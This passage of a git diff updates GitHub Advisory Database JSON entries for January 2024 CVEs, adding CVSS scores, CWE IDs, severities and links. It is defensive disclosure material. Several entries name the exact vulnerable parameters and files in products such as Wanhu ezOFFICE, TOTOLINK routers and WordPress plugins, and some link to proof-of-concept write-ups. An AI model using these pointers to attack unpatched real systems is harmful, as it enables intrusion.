a/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json b/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json index a97473e2604e5..0083176f37dec 100644 --- a/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json 
+++ b/advisories/unreviewed/2024/01/GHSA-3568-h36m-7jmf/GHSA-3568-h36m-7jmf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3568-h36m-7jmf", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0749" ], "details": "A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -41,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json b/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json index aae1d9b755efe..723a7e9dde092 100644 --- a/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json +++ b/advisories/unreviewed/2024/01/GHSA-36xj-gcr2-cgrf/GHSA-36xj-gcr2-cgrf.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-36xj-gcr2-cgrf", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51888" ], "details": "Buffer Overflow vulnerability in the nomath() function in Mathtex v.1.05 and before allows a remote attacker to cause a denial of service via a crafted string in the application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-39g9-xc8h-ffgp/GHSA-39g9-xc8h-ffgp.json b/advisories/unreviewed/2024/01/GHSA-39g9-xc8h-ffgp/GHSA-39g9-xc8h-ffgp.json new file mode 100644 index 0000000000000..c864d5948a541 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-39g9-xc8h-ffgp/GHSA-39g9-xc8h-ffgp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39g9-xc8h-ffgp", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24134" + ], + "details": "Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24134" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/2024_Online_Food_Menu_XSS/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/01/GHSA-39gr-m4xp-77wp/GHSA-39gr-m4xp-77wp.json b/advisories/unreviewed/2024/01/GHSA-39gr-m4xp-77wp/GHSA-39gr-m4xp-77wp.json new file mode 100644 index 0000000000000..d8427cee0905b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-39gr-m4xp-77wp/GHSA-39gr-m4xp-77wp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39gr-m4xp-77wp", + "modified": "2024-01-29T18:31:50Z", + "published": "2024-01-29T18:31:50Z", + "aliases": [ + "CVE-2023-1705" + ], + "details": "Missing Authorization vulnerability in Forcepoint F|One SmartEdge Agent on Windows (bgAutoinstaller service modules) allows Privilege Escalation, Functionality Bypass.This issue affects F|One SmartEdge Agent: before 1.7.0.230330-554.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1705" + }, + { + "type": "WEB", + "url": "https://support.forcepoint.com/s/article/000042333" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-39rp-fmqv-8wr2/GHSA-39rp-fmqv-8wr2.json b/advisories/unreviewed/2024/01/GHSA-39rp-fmqv-8wr2/GHSA-39rp-fmqv-8wr2.json new file mode 100644 index 0000000000000..6652b82417738 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-39rp-fmqv-8wr2/GHSA-39rp-fmqv-8wr2.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39rp-fmqv-8wr2", + "modified": "2024-01-31T09:30:18Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2024-1012" + ], + "details": "A vulnerability, which was classified as critical, has been found in Wanhu ezOFFICE 11.1.0. This issue affects some unknown processing of the file defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp. The manipulation of the argument recordId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252281 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1012" + }, + { + "type": "WEB", + "url": "https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252281" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252281" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T08:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json b/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json index d085aad0d27e0..f6eba10dfe318 100644 --- a/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json +++ b/advisories/unreviewed/2024/01/GHSA-3cfc-hrv3-xpx5/GHSA-3cfc-hrv3-xpx5.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3cfc-hrv3-xpx5", - "modified": "2024-01-26T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:22Z", "aliases": [ "CVE-2023-48126" ], "details": "An issue in Luxe Beauty Clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:56Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json b/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json index af7b19708bb75..ef52e5fcf29c2 100644 --- a/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json +++ b/advisories/unreviewed/2024/01/GHSA-3crw-hq66-3456/GHSA-3crw-hq66-3456.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3crw-hq66-3456", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-51210" ], "details": "SQL injection vulnerability in Webkul Bundle Product 6.0.1 allows a remote attacker to execute arbitrary code via the id_product parameters in the UpdateProductQuantity function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-89" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T19:15:08Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json b/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json index 9687ce636817b..6d4fe3cb5f105 100644 --- a/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json +++ b/advisories/unreviewed/2024/01/GHSA-3g75-6vfp-4hm3/GHSA-3g75-6vfp-4hm3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3g75-6vfp-4hm3", - "modified": "2024-01-27T03:30:21Z", + "modified": "2024-02-08T18:30:38Z", "published": "2024-01-27T03:30:21Z", "aliases": [ "CVE-2023-52389" ], "details": "UTF32Encoding.cpp in POCO has a Poco::UTF32Encoding integer overflow and resultant stack buffer overflow because Poco::UTF32Encoding::convert() and Poco::UTF32::queryConvert() may return a negative integer if a UTF-32 byte sequence evaluates to a value of 0x80000000 or higher. This is fixed in 1.11.8p2, 1.12.5p2, and 1.13.0.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T03:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3g98-33qx-2q68/GHSA-3g98-33qx-2q68.json b/advisories/unreviewed/2024/01/GHSA-3g98-33qx-2q68/GHSA-3g98-33qx-2q68.json new file mode 100644 index 0000000000000..6b1953ef72fa2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3g98-33qx-2q68/GHSA-3g98-33qx-2q68.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3g98-33qx-2q68",
+ "modified": "2024-02-06T15:32:04Z",
+ "published": "2024-01-31T18:31:27Z",
+ "aliases": [
+ "CVE-2024-22163"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shield Security Shield Security – Smart Bot Blocking & Intrusion Prevention Security allows Stored XSS.This issue affects Shield Security – Smart Bot Blocking & Intrusion Prevention Security: from n/a through 18.5.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22163"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/wp-simple-firewall/wordpress-shield-security-plugin-18-5-7-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json b/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json
index 94c301cdac8c3..168c14304f6e9 100644
--- a/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json
+++ b/advisories/unreviewed/2024/01/GHSA-3gg4-v4m9-rj55/GHSA-3gg4-v4m9-rj55.json
@@ -32,7 +32,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-261"
+ "CWE-261",
+ "CWE-326"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json b/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json
index 5c82c6426a460..be2bdd2e7c18c 100644
--- a/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json
+++ b/advisories/unreviewed/2024/01/GHSA-3gqv-8h4q-fff4/GHSA-3gqv-8h4q-fff4.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-277"
+ "CWE-277",
+ "CWE-732"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json b/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json
index 0ce54e5298b7b..a4ab33a65cc12 100644
--- a/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json
+++ b/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3h2h-j4vg-8xm8",
- "modified": "2024-01-28T03:30:35Z",
+ "modified": "2024-02-01T21:30:30Z",
 "published": "2024-01-28T03:30:35Z",
 "aliases": [
 "CVE-2024-23743"
 ],
 "details": "An issue in Notion for macOS version 3.1.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -27,7 +30,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-28T02:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json b/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json
index 4143639a1d71a..25fd0ca670ba2 100644
--- a/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json
+++ b/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3h6x-952r-xr8p",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2024-23213"
 ],
 "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -65,13 +68,17 @@
 {
 "type": "WEB",
 "url": "http://seclists.org/fulldisclosure/2024/Jan/40"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-3hv7-66gj-8929/GHSA-3hv7-66gj-8929.json b/advisories/unreviewed/2024/01/GHSA-3hv7-66gj-8929/GHSA-3hv7-66gj-8929.json
new file mode 100644
index 0000000000000..27d33021e9b21
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3hv7-66gj-8929/GHSA-3hv7-66gj-8929.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3hv7-66gj-8929",
+ "modified": "2024-02-03T00:31:32Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2023-6390"
+ ],
+ "details": "The WordPress Users WordPress plugin through 1.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6390"
+ },
+ {
+ "type": "WEB",
+ "url": "https://magos-securitas.com/txt/2023-6390.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/a0ca68d3-f885-46c9-9f6b-b77ad387d25d/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json b/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json
index ef473bdb6873f..c71634c97f7c9 100644
--- a/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json
+++ b/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json
@@ -28,7 +28,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json b/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json
index f31f366021e61..ca4e53f89eb3c 100644
--- a/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json
+++ b/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3mv9-fmvf-xvmx",
- "modified": "2024-01-19T15:30:20Z",
+ "modified": "2024-01-31T00:30:17Z",
 "published": "2024-01-19T15:30:20Z",
 "aliases": [
 "CVE-2022-40700"
diff --git a/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json b/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json
new file mode 100644
index 0000000000000..fd33d77d53224
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3qmj-w5mh-5gv3",
+ "modified": "2024-02-01T06:31:05Z",
+ "published": "2024-01-30T15:30:23Z",
+ "aliases": [
+ "CVE-2024-24329"
+ ],
+ "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json b/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json
index 5708a0e3b70a7..7d021cdd26797 100644
--- a/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json
+++ b/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3qxp-wv2v-jfc4",
- "modified": "2024-01-09T18:30:29Z",
+ "modified": "2024-02-08T12:30:48Z",
 "published": "2024-01-09T18:30:29Z",
 "aliases": [
 "CVE-2024-21312"
@@ -24,6 +24,10 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21312"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240208-0008/"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json b/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json
index fc1235f6d288b..b8175ff5924bc 100644
--- a/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json
+++ b/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3qxr-cm3w-hpmq",
- "modified": "2024-01-27T06:30:23Z",
+ "modified": "2024-02-01T06:31:04Z",
 "published": "2024-01-27T06:30:23Z",
 "aliases": [
 "CVE-2024-0618"
@@ -36,7 +36,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-3r8w-gj6v-wq3r/GHSA-3r8w-gj6v-wq3r.json b/advisories/unreviewed/2024/01/GHSA-3r8w-gj6v-wq3r/GHSA-3r8w-gj6v-wq3r.json
new file mode 100644
index 0000000000000..b3a938a2a6380
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3r8w-gj6v-wq3r/GHSA-3r8w-gj6v-wq3r.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3r8w-gj6v-wq3r",
+ "modified": "2024-01-31T18:31:26Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2023-50166"
+ ],
+ "details": "Pega Platform from 8.5.4 to 8.8.3 is affected by an XSS issue with an unauthenticated user and the redirect parameter.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50166"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.pega.com/support-doc/pega-security-advisory-h23-vulnerability-remediation-note"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3rhq-47cj-h9g4/GHSA-3rhq-47cj-h9g4.json b/advisories/unreviewed/2024/01/GHSA-3rhq-47cj-h9g4/GHSA-3rhq-47cj-h9g4.json
new file mode 100644
index 0000000000000..72778ee6cae61
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3rhq-47cj-h9g4/GHSA-3rhq-47cj-h9g4.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3rhq-47cj-h9g4",
+ "modified": "2024-01-30T18:30:20Z",
+ "published": "2024-01-30T18:30:20Z",
+ "aliases": [
+ "CVE-2024-21388"
+ ],
+ "details": "Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21388"
+ },
+ {
+ "type": "WEB",
+ "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21388"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T18:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3rjg-ff6r-x2c7/GHSA-3rjg-ff6r-x2c7.json b/advisories/unreviewed/2024/01/GHSA-3rjg-ff6r-x2c7/GHSA-3rjg-ff6r-x2c7.json
new file mode 100644
index 0000000000000..ba3074d33351e
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-3rjg-ff6r-x2c7/GHSA-3rjg-ff6r-x2c7.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3rjg-ff6r-x2c7",
+ "modified": "2024-01-31T12:30:17Z",
+ "published": "2024-01-31T12:30:17Z",
+ "aliases": [
+ "CVE-2024-1099"
+ ],
+ "details": "A vulnerability was found in Rebuild up to 3.5.5. It has been classified as problematic. Affected is the function getFileOfData of the file /filex/read-raw. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252456.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1099"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252456"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252456"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/dcilugg0htp973nx"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T12:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json b/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json
index 6393340b0ff84..43c6c2b926ab8 100644
